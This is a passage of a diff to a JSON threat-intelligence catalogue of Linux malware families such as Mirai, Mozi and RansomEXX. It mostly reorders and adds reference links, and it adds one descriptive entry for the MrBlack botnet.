- "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign",
- "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot",
- "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
- "https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine",
- "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html",
- "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
- "https://synthesis.to/2021/06/30/automating_string_decryption.html",
- "https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/",
- "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/",
"https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/",
- "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
- "https://github.com/jgamblin/Mirai-Source-Code",
- "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/",
- "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
- "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
- "https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html",
- "https://www.youtube.com/watch?v=KVJyYTie-Dc",
- "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
- "https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/",
- "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group",
- "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/",
- "https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/",
+ "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/",
"https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space",
- "https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18",
- "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
- "http://osint.bambenekconsulting.com/feeds/",
- "https://community.riskiq.com/article/d8a78daf",
- "https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/",
- "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/",
+ "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
+ "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html",
"https://isc.sans.edu/diary/22786",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "http://osint.bambenekconsulting.com/feeds/",
+ "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/",
+ "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
+ "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/",
+ "https://community.riskiq.com/article/d8a78daf",
+ "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html",
+ "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
+ "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/",
+ "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
+ "https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18",
+ "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/",
+ "https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/",
+ "https://cert.gov.ua/article/37139",
+ "https://synthesis.to/2021/06/30/automating_string_decryption.html",
+ "https://www.youtube.com/watch?v=KVJyYTie-Dc",
+ "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx",
+ "https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/",
+ "https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/",
+ "https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability",
+ "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants",
+ "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
+ "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
"https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html",
+ "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group",
+ "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/",
+ "https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/",
+ "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet",
+ "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
+ "https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093",
+ "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/",
+ "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt",
+ "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
+ "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
"https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai",
- "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/",
+ "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet",
+ "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/",
+ "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/",
"https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html",
- "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt",
- "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/",
- "https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/",
- "https://cert.gov.ua/article/37139",
- "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants",
- "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet",
- "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/",
- "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
- "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
- "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
+ "https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html",
"https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
- "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet",
- "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/"
+ "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign",
+ "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/",
+ "https://github.com/jgamblin/Mirai-Source-Code",
+ "https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/",
+ "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
],
"synonyms": [
"Katana"
@@ -5135,12 +5615,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot",
- "https://unit42.paloaltonetworks.com/moobot-d-link-devices/",
- "https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability",
- "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b",
"https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
+ "https://unit42.paloaltonetworks.com/moobot-d-link-devices/",
+ "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b",
"https://blog.netlab.360.com/ddos-botnet-moobot-en/",
- "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/"
+ "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/",
+ "https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability"
],
"synonyms": [],
"type": []
@@ -5169,17 +5649,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi",
- "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet",
"https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/",
- "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/",
- "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/",
- "https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/",
- "https://blog.netlab.360.com/mozi-another-botnet-using-dht/",
- "https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/",
"https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
"https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/",
+ "https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/",
+ "https://blog.netlab.360.com/mozi-another-botnet-using-dht/",
"https://www.youtube.com/watch?v=cDFO_MRlg3M",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf"
+ "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/",
+ "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/",
+ "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet"
],
"synonyms": [],
"type": []
@@ -5188,12 +5668,12 @@
"value": "Mozi"
},
{
- "description": "",
+ "description": "MrBlack, first identified in May 2014 by Russian security firm Dr. Web, is a botnet that targets Linux OS and is designed to conduct distributed denial-of-service (DDoS) attacks. In May 2015, Incapsula clients suffered a large-scale DDoS attack which the company attributed to network traffic generated by tens of thousands of small office/home office (SOHO) routers infected with MrBlack. This massive botnet spans over 109 countries, especially in Thailand and Brazil.\r\n\r\nMrBlack scans for and infects routers that have not had their default login credentials changed and that allow remote access to HTTP and SSH via port 80 and port 22, respectively. One of the most impacted router brands is Ubiquiti, a U.S.-based firm that provides bulk network hub solutions for internet service providers to lease to their customers. Once a vulnerable router is compromised and MrBlack is injected into the system, a remote server is contacted and system information from the device is transmitted. This allows the host server to receive commands in order to perform different types of DDoS attacks, download and execute files, and terminate processes.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack",
- "https://news.drweb.com/?i=5760&c=23&lng=en",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf"
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
+ "https://news.drweb.com/?i=5760&c=23&lng=en"
],
"synonyms": [],
"type": []
@@ -5232,9 +5712,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb",
- "https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/",
"https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/",
- "https://twitter.com/IntezerLabs/status/1324346324683206657"
+ "https://twitter.com/IntezerLabs/status/1324346324683206657",
+ "https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/"
],
"synonyms": [],
"type": []
@@ -5262,13 +5742,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/",
- "https://news.sophos.com/en-us/2020/05/21/asnarok2/",
"https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html",
- "https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/",
"https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html",
+ "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/",
+ "https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/",
"https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/"
+ "https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/",
+ "https://news.sophos.com/en-us/2020/05/21/asnarok2/"
],
"synonyms": [
"remove_bds"
@@ -5296,13 +5776,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari",
+ "https://twitter.com/ankit_anubhav/status/1019647993547550720",
+ "https://twitter.com/hrbrmstr/status/1019922651203227653",
"https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863",
"https://twitter.com/360Netlab/status/1019759516789821441",
"https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html",
- "https://twitter.com/ankit_anubhav/status/1019647993547550720",
"https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/",
- "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/",
- "https://twitter.com/hrbrmstr/status/1019922651203227653"
+ "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/"
],
"synonyms": [],
"type": []
@@ -5341,18 +5821,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://lab52.io/blog/looking-for-penquins-in-the-wild/",
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
- "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
- "https://www.youtube.com/watch?v=JXsjRUxx47E",
- "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://twitter.com/juanandres_gs/status/944741575837528064",
+ "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
+ "https://lab52.io/blog/looking-for-penquins-in-the-wild/",
"https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
"https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf",
- "https://twitter.com/juanandres_gs/status/944741575837528064"
+ "https://www.youtube.com/watch?v=JXsjRUxx47E",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf"
],
"synonyms": [],
"type": []
@@ -5365,17 +5845,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot",
- "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html",
- "https://twitter.com/Nocturnus/status/1308430959512092673",
- "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf",
- "https://brianstadnicki.github.io/posts/malware-gitlab-perlbot/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/",
- "https://sysdig.com/blog/malware-analysis-shellbot-sysdig/",
"https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
"https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf",
+ "https://twitter.com/Nocturnus/status/1308430959512092673",
+ "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html",
+ "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/",
"https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/",
- "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/"
+ "https://brianstadnicki.github.io/posts/malware-gitlab-perlbot/",
+ "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://sysdig.com/blog/malware-analysis-shellbot-sysdig/",
+ "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf",
+ "https://asec.ahnlab.com/en/49769/"
],
"synonyms": [
"DDoS Perl IrcBot",
@@ -5399,6 +5880,19 @@
"uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7",
"value": "Persirai"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pingpull",
+ "https://unit42.paloaltonetworks.com/alloy-taurus/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "65a7944c-15d9-4ca5-8561-7c97b18684c8",
+ "value": "PingPull"
+ },
{
"description": "A botnet with P2P and centralized C&C capabilities.",
"meta": {
@@ -5417,13 +5911,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://cyberandramen.net/2021/02/11/blacktech-updates-elf-plead-backdoor/",
"https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html",
"https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
- "https://cyberandramen.net/2021/02/11/blacktech-updates-elf-plead-backdoor/",
- "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020"
+ "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
"type": []
@@ -5464,13 +5959,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://twitter.com/IntezerLabs/status/1338480158249013250",
+ "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html",
+ "https://cujo.com/iot-malware-journals-prometei-linux/",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
"https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities",
- "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html",
- "https://twitter.com/IntezerLabs/status/1338480158249013250",
- "https://cujo.com/iot-malware-journals-prometei-linux/"
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
"type": []
@@ -5497,8 +5992,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
- "https://github.com/n1nj4sec/pupy"
+ "https://github.com/n1nj4sec/pupy",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf"
],
"synonyms": [],
"type": []
@@ -5511,18 +6006,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt",
- "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/",
"https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/",
- "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
"https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/",
- "https://www.ibm.com/downloads/cas/Z81AVOY7",
- "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/",
- "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf",
- "https://www.qnap.com/en/security-advisory/QSA-20-02",
"https://www.anomali.com/blog/the-ech0raix-ransomware",
"https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
+ "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
+ "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/",
+ "https://www.qnap.com/en/security-advisory/QSA-20-02",
+ "https://www.ibm.com/downloads/cas/Z81AVOY7",
+ "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/",
+ "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf",
+ "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/"
],
"synonyms": [
"eCh0raix"
@@ -5537,12 +6032,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch",
- "https://bin.re/blog/the-dga-of-qsnatch/",
- "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf",
"https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html",
- "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf",
"https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-209a"
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-209a",
+ "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf",
+ "https://bin.re/blog/the-dga-of-qsnatch/",
+ "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf"
],
"synonyms": [],
"type": []
@@ -5555,7 +6050,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.quietexit",
- "https://www.mandiant.com/resources/unc3524-eye-spy-email"
+ "https://www.mandiant.com/resources/unc3524-eye-spy-email",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023"
],
"synonyms": [],
"type": []
@@ -5582,6 +6078,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ragnarlocker",
"https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
"https://twitter.com/malwrhunterteam/status/1475568201673105409"
],
"synonyms": [],
@@ -5609,23 +6106,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx",
- "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf",
- "https://www.youtube.com/watch?v=qxPXxWMI2i4",
- "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
"https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/"
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
